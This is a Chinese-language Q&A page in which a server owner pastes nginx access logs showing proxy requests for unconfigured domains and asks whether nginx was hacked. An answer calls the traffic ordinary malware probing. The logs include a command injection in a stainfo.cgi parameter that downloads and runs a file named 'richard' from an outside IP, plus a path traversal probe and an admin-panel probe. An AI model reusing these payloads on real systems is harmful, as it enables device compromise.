我没有配置的Nginx自动转发域名

我没有配置的Nginx自动转发域名

我在 DigitalOcean 上设置了一个新服务器。我忘记激活防火墙一天了,然后我检查了 nginx 日志并看到以下几行:

120.216.207.173 - - [11/Dec/2019:01:42:29 +0000] "GET http://ah.sina.com.cn/ HTTP/1.1" 200 612 "http://ah.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE
 9.0; Windows NT 6.1; Trident/5.0)"
185.53.88.5 - - [11/Dec/2019:02:07:44 +0000] "GET //admin/config.php?password%5B0%5D=ZIZO&username=admin HTTP/1.1" 400 37 "-" "python-requests/2.6.0 C
Python/2.7.5 Linux/3.10.0-1062.4.3.el7.x86_64"
94.102.49.104 - - [11/Dec/2019:02:13:57 +0000] "GET ../../proc/ HTTP" 400 173 "-" "-"
120.216.207.173 - - [11/Dec/2019:02:52:07 +0000] "GET http://www.jaycn.com/ HTTP/1.1" 200 612 "http://www.jaycn.com/" "Mozilla/5.0 (compatible; MSIE 9
.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:15 +0000] "GET http://www.enet.com.cn/ HTTP/1.1" 200 612 "http://www.enet.com.cn/" "Mozilla/5.0 (compatible; MS
IE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:02:52:19 +0000] "GET http://www.rising.cn/ HTTP/1.1" 200 612 "http://www.rising.cn/" "Mozilla/5.0 (compatible; MSIE 9
.0; Windows NT 6.1; Trident/5.0)"
208.97.139.112 - - [11/Dec/2019:02:52:46 +0000] "POST /stainfo.cgi?ifname=eth0;wget http://145.249.106.241/richard; curl -O http://145.249.106.241/ric
hard; chmod +x richard; sh richard HTTP/1.0" 404 169 "-" "-"
120.216.207.173 - - [11/Dec/2019:03:27:29 +0000] "GET http://www.xinhuanet.com/ HTTP/1.1" 200 612 "http://www.xinhuanet.com/" "Mozilla/5.0 (compatible
; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:33 +0000] "GET http://blog.sina.com.cn/ HTTP/1.1" 200 612 "http://blog.sina.com.cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:36 +0000] "GET http://www.guokr.com/ HTTP/1.1" 200 612 "http://www.guokr.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
120.216.207.173 - - [11/Dec/2019:04:21:41 +0000] "GET http://www.ecitic.com/ HTTP/1.1" 200 612 "http://www.ecitic.com/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

我想知道我的 nginx 怎么会返回未配置的域名?这是否意味着 nginx 被黑客入侵了?

答案1

这只是恶意软件的利用尝试,很常见且正常。

IP 地址表明这是恶意软件https://twitter.com/carbreal/status/1205059129619947520/photo/3

相关内容